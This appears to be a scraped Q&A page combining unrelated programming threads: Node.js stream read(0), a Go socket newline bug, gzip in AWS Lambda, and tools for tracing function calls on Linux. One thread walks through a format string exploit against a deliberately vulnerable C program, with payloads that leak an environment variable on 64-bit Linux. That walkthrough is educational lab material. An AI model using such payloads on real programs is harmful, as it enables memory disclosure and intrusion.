What does read(0) in node stream do? - node.js

Could anyone illustrate how read(0) in node stream works, and in which case it is necessary?
The official read(0) doc is here. It says:
There are some cases where it is necessary to trigger a refresh of the underlying readable stream mechanisms, without actually consuming any data. In such cases, it is possible to call readable.read(0), which will always return null.
I met one case where read(0) is necessary. It is from stream-handbook. The source code is:
process.stdin.on('readable', function () {
var buf = process.stdin.read(3);
console.dir(buf);
process.stdin.read(0);
});
The result is:
$ (echo abc; sleep 1; echo def; sleep 1; echo ghi) | node consume2.js
<Buffer 61 62 63>
<Buffer 0a 64 65>
<Buffer 66 0a 67>
<Buffer 68 69 0a>
Comment out the read(0) sentence,
process.stdin.on('readable', function () {
var buf = process.stdin.read(3);
console.dir(buf);
// process.stdin.read(0);
});
The result would be:
$ (echo abc; sleep 1; echo def; sleep 1; echo ghi) | node consume1.js
<Buffer 61 62 63>
<Buffer 0a 64 65>
<Buffer 66 0a 67>
I experimented with the above code and found that if I removed sleep 1 from the subshell command, then read(0) sentence is not necessary.
I think here the subshell sends a 'end of stream' event to consumer1.js after sending ghi, but it seems consumer1.js does not receive the 'end of stream' event unless read(0) does something. When read(0) does something, the js file knows there is an'end of stream', and the readable is triggered once more.
So my questions are:
What is read(0) doing here?
Why does read(0) become unnecessary when sleep 1 is removed from the shell command
Can any one provide more cases where read(0) is necessary? (I tried file stream instead of stdin as js file input, then read(0) is not necessary)
Thanks.

Related

Disassembling Code inside of a C++ program

objdump -D file.o will output something like
2b: 47 rex.RXB
2c: 43 rex.XB
2d: 43 3a 20 rex.XB cmp (%r8),%spl
In my program I have a pointer to the instruction and need to disassemble the first instruction found (not the whole file). What would be the easiest way to do that? For example
uint8_t * inst_ptr = memory_location
std::string human_readable = get_disassembly(instr_ptr)
human_readable = "43 3a 20 rex.XB cmp (%r8),%spl"
Is there linux headers/includes that do this already?
Ive been googling but havent found a good, straight forward solution.

Use net Write to send data\r\n is sent as a string instead of eof

I want use socket send 'info\r\n' to redis server by net, send data is 69 6e 66 6f 5c 72 5c 6e
but i want send data is 69 6e 66 6f 0d 0a,\r\n treated as an string and wrong becomes 5c 72 5c 6e
send data is string in code i turn string to []byte and conn.write
This sending seems to be wrong, what is the correct sending method?
Your data 69 6e 66 6f 5c 72 5c 6e is:
b := []byte{0x69, 0x6e, 0x66, 0x6f, 0x5c, 0x72, 0x5c, 0x6e}
fmt.Printf("%q\n", string(b))
Which outputs:
"info\\r\\n"
It contains a backslash, an r, another backslash and an n character at the end.
You want to send a carriage return \r and a newline character \n, you don't have to send these "literally". \r and \n are single byte data, not 2-character sequences.
Your data should be:
b = []byte{0x69, 0x6e, 0x66, 0x6f, '\r', '\n'}
fmt.Printf("%q\n", string(b))
Which outputs:
"info\r\n"
Or simply:
b = []byte("info\r\n")
fmt.Printf("%q\n", string(b))
Which outputs the same. Try the examples on the Go Playground.
Know that the string literal "info\r\n" is an interpreted string literal, \r and \n sequences in it will be interpreted as single characters (the carriage return and newline characters). This is detailed in Spec: String literals.

Reading an environment variable using the format string vulnerability in a 64 bit OS

I'm trying to read a value from the environment by using the format string vulnerability.
This type of vulnerability is documented all over the web, however the examples that I've found only cover 32 bits Linux, and my desktop's running a 64 bit Linux.
This is the code I'm using to run my tests on:
//fmt.c
#include <stdio.h>
#include <string.h>
int main (int argc, char *argv[]) {
char string[1024];
if (argc < 2)
return 0;
strcpy( string, argv[1] );
printf( "vulnerable string: %s\n", string );
printf( string );
printf( "\n" );
}
After compiling that I put my test variable and get its address. Then I pass it to the program as a parameter and I add a bunch of format in order to read from them:
$ export FSTEST="Look at my horse, my horse is amazing."
$ echo $FSTEST
Look at my horse, my horse is amazing.
$ ./getenvaddr FSTEST ./fmt
FSTEST: 0x7fffffffefcb
$ printf '\xcb\xef\xff\xff\xff\x7f' | od -vAn -tx1c
cb ef ff ff ff 7f
313 357 377 377 377 177
$ ./fmt $(printf '\xcb\xef\xff\xff\xff\x7f')`python -c "print('%016lx.'*10)"`
vulnerable string: %016lx.%016lx.%016lx.%016lx.%016lx.%016lx.%016lx.%016lx.%016lx.%016lx.
00000000004052a0.0000000000000000.0000000000000000.00000000ffffffff.0000000000000060.
0000000000000001.00000060f7ffd988.00007fffffffd770.00007fffffffd770.30257fffffffefcb.
$ echo '\xcb\xef\xff\xff\xff\x7f%10$16lx'"\c" | od -vAn -tx1c
cb ef ff ff ff 7f 25 31 30 24 31 36 6c 78
313 357 377 377 377 177 % 1 0 $ 1 6 l x
$ ./fmt $(echo '\xcb\xef\xff\xff\xff\x7f%10$16lx'"\c")
vulnerable string: %10$16lx
31257fffffffefcb
The 10th value contains the address I want to read from, however it's not padded with 0s but with the value 3125 instead.
Is there a way to properly pad that value so I can read the environment variable with something like the '%s' format?
So, after experimenting for a while, I ran into a way to read an environment variable by using the format string vulnerability.
It's a bit sloppy, but hey - it works.
So, first the usual. I create an environment value and find its location:
$ export FSTEST="Look at my horse, my horse is amazing."
$ echo $FSTEST
Look at my horse, my horse is amazing.
$ /getenvaddr FSTEST ./fmt
FSTEST: 0x7fffffffefcb
Now, no matter how I tried, putting the address before the format strings always got both mixed, so I moved the address to the back and added some padding of my own, so I could identify it and add more padding if needed.
Also, python and my environment don't get along with some escape sequences, so I ended up using a mix of both the python one-liner and printf (with an extra '%' due to the way the second printf parses a single '%' - be sure to remove this extra '%' after you test it with od/hexdump/whathaveyou)
$ printf `python -c "print('%%016lx|' *1)"\
`$(printf '--------\xcb\xef\xff\xff\xff\x7f\x00') | od -vAn -tx1c
25 30 31 36 6c 78 7c 2d 2d 2d 2d 2d 2d 2d 2d cb
% 0 1 6 l x | - - - - - - - - 313
ef ff ff ff 7f
357 377 377 377 177
With that solved, next step would be to find either the padding or (if you're lucky) the address.
I'm repeating the format string 110 times, but your mileage might vary:
./fmt `python -c "print('%016lx|' *110)"\
`$(printf '--------\xcb\xef\xff\xff\xff\x7f\x00')
vulnerable string: %016lx|%016lx|%016lx|%016lx|%016lx|...|--------
00000000004052a0|0000000000000000|0000000000000000|fffffffffffffff3|
0000000000000324|...|2d2d2d2d2d2d7c78|7fffffffefcb2d2d|0000038000000300|
00007fffffffd8d0|00007ffff7ffe6d0|--------
The consecutive '2d' values are just the hex values for '-'
After adding more '-' for padding and testing, I ended up with something like this:
./fmt `python -c "print('%016lx|' *110)"\
`$(printf '------------------------------\xcb\xef\xff\xff\xff\x7f\x00')
vulnerable string: %016lx|%016lx|%016lx|%016lx|...|------------------------------
00000000004052a0|0000000000000000|0000000000000000|fffffffffffffff3|
000000000000033a|...|2d2d2d2d2d2d7c78|2d2d2d2d2d2d2d2d|2d2d2d2d2d2d2d2d|
2d2d2d2d2d2d2d2d|00007fffffffefcb|------------------------------
So, the address got pushed towards the very last format placeholder.
Let's modify the way we output these format placeholders so we can manipulate the last one in a more convenient way:
$ ./fmt `python -c "print('%016lx|' *109 + '%016lx|')"\
`$(printf '------------------------------\xcb\xef\xff\xff\xff\x7f\x00')
vulnerable string: %016lx|%016lx|%016lx|...|------------------------------
00000000004052a0|0000000000000000|0000000000000000|fffffffffffffff3|
000000000000033a|...|2d2d2d2d2d2d7c78|2d2d2d2d2d2d2d2d|2d2d2d2d2d2d2d2d|
2d2d2d2d2d2d2d2d|00007fffffffefcb|------------------------------
It should show the same result, but now it's possible to use an '%s' as the last placeholder.
Replacing '%016lx|' with just '%s|' wont work, because the extra padding is needed. So, I just add 4 extra '|' characters to compensate:
./fmt `python -c "print('%016lx|' *109 + '||||%s|')"\
`$(printf '------------------------------\xcb\xef\xff\xff\xff\x7f\x00')
vulnerable string: %016lx|%016lx|%016lx|...|||||%s|------------------------------
00000000004052a0|0000000000000000|0000000000000000|fffffffffffffff3|
000000000000033a|...|2d2d2d2d2d2d7c73|2d2d2d2d2d2d2d2d|2d2d2d2d2d2d2d2d|
2d2d2d2d2d2d2d2d|||||Look at my horse, my horse is amazing.|
------------------------------
VoilĂ , the environment variable got leaked.

Decompressing data received as binary data in lambda - incorrect header check

I want to send compressed data (gzip) to some URL that will trigger a (proxy) lambda function, that will decompress the data.
The lambda function (NodeJS 8):
let zlib = require('zlib');
exports.handler = async (event) => {
let decompressedData = zlib.gunzipSync(event['body'])
return {
"statusCode": 200,
"body": decompressedData.toString()
};
};
I trigger it with a curl command to the URL (through API gateway), for some file that I compressed example.gz with gzip:
curl -X POST --data-binary #example.gz https://URL...
As a result, I get:
{"message": "Internal server error"}
And the error is (logs in Cloudwatch):
"errorMessage": "incorrect header check",
"errorType": "Error",
"stackTrace": [
"Gunzip.zlibOnError (zlib.js:153:15)",
"Gunzip._processChunk (zlib.js:411:30)",
"zlibBufferSync (zlib.js:144:38)",
"Object.gunzipSync (zlib.js:590:14)",
"exports.handler (/var/task/test_index.js:5:33)"
]
When I looked at the event['body'] itself, I see the exact data as I see in example.gz. Perhaps I need some special header? I just want to pass the data as is.
as Michael - sqlbot said, By default, API Gateway can't pass binary data into a Lambda function.
What worked for me:
I added the header Content-Type: application/octet-stream in the curl command, and in the API gateway settings, on Binary Media Types I added application/octet-stream.
This way, the data is passed in base64, and afterwards I just converted the date that is in base64 to a buffer:
let data = Buffer.from(event['body'], "base64")
And afterwards just decompress it.
For more information read here
1/ First you need to build your gzip correctly, ensure that gzip file header is not present : curl command a gzipped POST body to an apache server
Wrong way :
echo '{ "mydummy" : "json" }' > body
gzip body
hexdump -C body.gz
00000000 1f 8b 08 08 20 08 30 59 00 03 62 6f 64 79 00 ab |.... .0Y..body..|
00000010 56 50 ca ad 4c 29 cd cd ad 54 52 b0 52 50 ca 2a |VP..L)...TR.RP.*|
00000020 ce cf 53 52 a8 e5 02 00 a6 6a 24 99 17 00 00 00 |..SR.....j$.....|
00000030
Good way :
echo '{ "mydummy" : "json" }' | gzip > body.gz
hexdump -C body.gz
00000000 1f 8b 08 00 08 0a 30 59 00 03 ab 56 50 ca ad 4c |......0Y...VP..L|
00000010 29 cd cd ad 54 52 b0 52 50 ca 2a ce cf 53 52 a8 |)...TR.RP.*..SR.|
00000020 e5 02 00 a6 6a 24 99 17 00 00 00 |....j$.....|
0000002b
2/ In curl don't forget to specify the content-encoding with
-H "Content-Encoding: gzip"
3/ In addition if you use express+compress you don't need to call zlib
curl -X POST "http://example.org/api/a" -H "Content-Encoding: gzip" -H "Content-Type: application/json" --data-binary #body.gz
router.post("/api/a", function(req, res){
console.log(req.body); // { mydummy: 'json' }
});

Tool to trace local function calls in Linux

I am looking for a tool like ltrace or strace that can trace locally defined functions in an executable. ltrace only traces dynamic library calls and strace only traces system calls. For example, given the following C program:
#include <stdio.h>
int triple ( int x )
{
return 3 * x;
}
int main (void)
{
printf("%d\n", triple(10));
return 0;
}
Running the program with ltrace will show the call to printf since that is a standard library function (which is a dynamic library on my system) and strace will show all the system calls from the startup code, the system calls used to implement printf, and the shutdown code, but I want something that will show me that the function triple was called. Assuming that the local functions have not been inlined by an optimizing compiler and that the binary has not been stripped (symbols removed), is there a tool that can do this?
Edit
A couple of clarifications:
It is okay if the tool also provides trace information for non-local functions.
I don't want to have to recompile the program(s) with support for specific tools, the symbol information in the executable should be enough.
I would be really nice if I could use the tool to attach to existing processes like I can with ltrace/strace.
Assuming you only want to be notified for specific functions, you can do it like this:
compile with debug informations (as you already have symbol informations, you probably also have enough debugs in)
given
#include <iostream>
int fac(int n) {
if(n == 0)
return 1;
return n * fac(n-1);
}
int main()
{
for(int i=0;i<4;i++)
std::cout << fac(i) << std::endl;
}
Use gdb to trace:
[js#HOST2 cpp]$ g++ -g3 test.cpp
[js#HOST2 cpp]$ gdb ./a.out
(gdb) b fac
Breakpoint 1 at 0x804866a: file test.cpp, line 4.
(gdb) commands 1
Type commands for when breakpoint 1 is hit, one per line.
End with a line saying just "end".
>silent
>bt 1
>c
>end
(gdb) run
Starting program: /home/js/cpp/a.out
#0 fac (n=0) at test.cpp:4
1
#0 fac (n=1) at test.cpp:4
#0 fac (n=0) at test.cpp:4
1
#0 fac (n=2) at test.cpp:4
#0 fac (n=1) at test.cpp:4
#0 fac (n=0) at test.cpp:4
2
#0 fac (n=3) at test.cpp:4
#0 fac (n=2) at test.cpp:4
#0 fac (n=1) at test.cpp:4
#0 fac (n=0) at test.cpp:4
6
Program exited normally.
(gdb)
Here is what i do to collect all function's addresses:
tmp=$(mktemp)
readelf -s ./a.out | gawk '
{
if($4 == "FUNC" && $2 != 0) {
print "# code for " $NF;
print "b *0x" $2;
print "commands";
print "silent";
print "bt 1";
print "c";
print "end";
print "";
}
}' > $tmp;
gdb --command=$tmp ./a.out;
rm -f $tmp
Note that instead of just printing the current frame(bt 1), you can do anything you like, printing the value of some global, executing some shell command or mailing something if it hits the fatal_bomb_exploded function :) Sadly, gcc outputs some "Current Language changed" messages in between. But that's easily grepped out. No big deal.
System Tap can be used on a modern Linux box (Fedora 10, RHEL 5, etc.).
First download the para-callgraph.stp script.
Then run:
$ sudo stap para-callgraph.stp 'process("/bin/ls").function("*")' -c /bin/ls
0 ls(12631):->main argc=0x1 argv=0x7fff1ec3b038
276 ls(12631): ->human_options spec=0x0 opts=0x61a28c block_size=0x61a290
365 ls(12631): <-human_options return=0x0
496 ls(12631): ->clone_quoting_options o=0x0
657 ls(12631): ->xmemdup p=0x61a600 s=0x28
815 ls(12631): ->xmalloc n=0x28
908 ls(12631): <-xmalloc return=0x1efe540
950 ls(12631): <-xmemdup return=0x1efe540
990 ls(12631): <-clone_quoting_options return=0x1efe540
1030 ls(12631): ->get_quoting_style o=0x1efe540
See also: Observe, systemtap and oprofile updates
Using Uprobes (since Linux 3.5)
Assuming you wanted to trace all functions in ~/Desktop/datalog-2.2/datalog when calling it with the parameters -l ~/Desktop/datalog-2.2/add.lua ~/Desktop/datalog-2.2/test.dl
cd /usr/src/linux-`uname -r`/tools/perf
for i in `./perf probe -F -x ~/Desktop/datalog-2.2/datalog`; do sudo ./perf probe -x ~/Desktop/datalog-2.2/datalog $i; done
sudo ./perf record -agR $(for j in $(sudo ./perf probe -l | cut -d' ' -f3); do echo "-e $j"; done) ~/Desktop/datalog-2.2/datalog -l ~/Desktop/datalog-2.2/add.lua ~/Desktop/datalog-2.2/test.dl
sudo ./perf report -G
Assuming you can re-compile (no source change required) the code you want to trace with the gcc option -finstrument-functions, you can use etrace to get the function call graph.
Here is what the output looks like:
\-- main
| \-- Crumble_make_apple_crumble
| | \-- Crumble_buy_stuff
| | | \-- Crumble_buy
| | | \-- Crumble_buy
| | | \-- Crumble_buy
| | | \-- Crumble_buy
| | | \-- Crumble_buy
| | \-- Crumble_prepare_apples
| | | \-- Crumble_skin_and_dice
| | \-- Crumble_mix
| | \-- Crumble_finalize
| | | \-- Crumble_put
| | | \-- Crumble_put
| | \-- Crumble_cook
| | | \-- Crumble_put
| | | \-- Crumble_bake
On Solaris, truss (strace equivalent) has the ability to filter the library to be traced. I'm was surprised when I discovered strace doesn't have such a capability.
KcacheGrind
https://kcachegrind.github.io/html/Home.html
Test program:
int f2(int i) { return i + 2; }
int f1(int i) { return f2(2) + i + 1; }
int f0(int i) { return f1(1) + f2(2); }
int pointed(int i) { return i; }
int not_called(int i) { return 0; }
int main(int argc, char **argv) {
int (*f)(int);
f0(1);
f1(1);
f = pointed;
if (argc == 1)
f(1);
if (argc == 2)
not_called(1);
return 0;
}
Usage:
sudo apt-get install -y kcachegrind valgrind
# Compile the program as usual, no special flags.
gcc -ggdb3 -O0 -o main -std=c99 main.c
# Generate a callgrind.out.<PID> file.
valgrind --tool=callgrind ./main
# Open a GUI tool to visualize callgrind data.
kcachegrind callgrind.out.1234
You are now left inside an awesome GUI program that contains a lot of interesting performance data.
On the bottom right, select the "Call graph" tab. This shows an interactive call graph that correlates to performance metrics in other windows as you click the functions.
To export the graph, right click it and select "Export Graph". The exported PNG looks like this:
From that we can see that:
the root node is _start, which is the actual ELF entry point, and contains glibc initialization boilerplate
f0, f1 and f2 are called as expected from one another
pointed is also shown, even though we called it with a function pointer. It might not have been called if we had passed a command line argument.
not_called is not shown because it didn't get called in the run, because we didn't pass an extra command line argument.
The cool thing about valgrind is that it does not require any special compilation options.
Therefore, you could use it even if you don't have the source code, only the executable.
valgrind manages to do that by running your code through a lightweight "virtual machine".
Tested on Ubuntu 18.04.
$ sudo yum install frysk
$ ftrace -sym:'*' -- ./a.out
More: ftrace.1
If you externalize that function into an external library, you should also be able to see it getting called, ( with ltrace ).
The reason this works is because ltrace puts itself between your app and the library, and when all the code is internalized with the one file it can't intercept the call.
ie: ltrace xterm
spews stuff from X libraries, and X is hardly system.
Outside this, the only real way to do it is compile-time intercept via prof flags or debug symbols.
I just ran over this app, which looks interesting:
http://www.gnu.org/software/cflow/
But I dont think thats what you want.
If the functions aren't inlined, you might even have luck using objdump -d <program>.
For an example, let's take a loot at the beginning of GCC 4.3.2's main routine:
$ objdump `which gcc` -d | grep '\(call\|main\)'
08053270 <main>:
8053270: 8d 4c 24 04 lea 0x4(%esp),%ecx
--
8053299: 89 1c 24 mov %ebx,(%esp)
805329c: e8 8f 60 ff ff call 8049330 <strlen#plt>
80532a1: 8d 04 03 lea (%ebx,%eax,1),%eax
--
80532cf: 89 04 24 mov %eax,(%esp)
80532d2: e8 b9 c9 00 00 call 805fc90 <xmalloc_set_program_name>
80532d7: 8b 5d 9c mov 0xffffff9c(%ebp),%ebx
--
80532e4: 89 04 24 mov %eax,(%esp)
80532e7: e8 b4 a7 00 00 call 805daa0 <expandargv>
80532ec: 8b 55 9c mov 0xffffff9c(%ebp),%edx
--
8053302: 89 0c 24 mov %ecx,(%esp)
8053305: e8 d6 2a 00 00 call 8055de0 <prune_options>
805330a: e8 71 ac 00 00 call 805df80 <unlock_std_streams>
805330f: e8 4c 2f 00 00 call 8056260 <gcc_init_libintl>
8053314: c7 44 24 04 01 00 00 movl $0x1,0x4(%esp)
--
805331c: c7 04 24 02 00 00 00 movl $0x2,(%esp)
8053323: e8 78 5e ff ff call 80491a0 <signal#plt>
8053328: 83 e8 01 sub $0x1,%eax
It takes a bit of effort to wade through all of the assembler, but you can see all possible calls from a given function. It's not as easy to use as gprof or some of the other utilities mentioned, but it has several distinct advantages:
You generally don't need to recompile an application to use it
It shows all possible function calls, whereas something like gprof will only show the executed function calls.
There is a shell script for automatizating tracing function calls with gdb. But it can't attach to running process.
blog.superadditive.com/2007/12/01/call-graphs-using-the-gnu-project-debugger/
Copy of the page - http://web.archive.org/web/20090317091725/http://blog.superadditive.com/2007/12/01/call-graphs-using-the-gnu-project-debugger/
Copy of the tool - callgraph.tar.gz
http://web.archive.org/web/20090317091725/http://superadditive.com/software/callgraph.tar.gz
It dumps all functions from program and generate a gdb command file with breakpoints on each function. At each breakpoint, "backtrace 2" and "continue" are executed.
This script is rather slow on big porject (~ thousands of functions), so i add a filter on function list (via egrep). It was very easy, and I use this script almost evry day.
Gprof might be what you want
See traces, a tracing framework for Linux C/C++ applications:
https://github.com/baruch/traces#readme
It requires recompiling your code with its instrumentor, but will provide a listing of all functions, their parameters and return values. There's an interactive to allow easy navigation of large data samples.
Hopefully the callgrind or cachegrind tools for Valgrind will give you the information you seek.
NOTE: This is not the linux kernel based ftrace, but rather a tool I recently designed to accomplish local function tracing and control flow. Linux ELF x86_64/x86_32 are supported publicly.
https://github.com/leviathansecurity/ftrace

Resources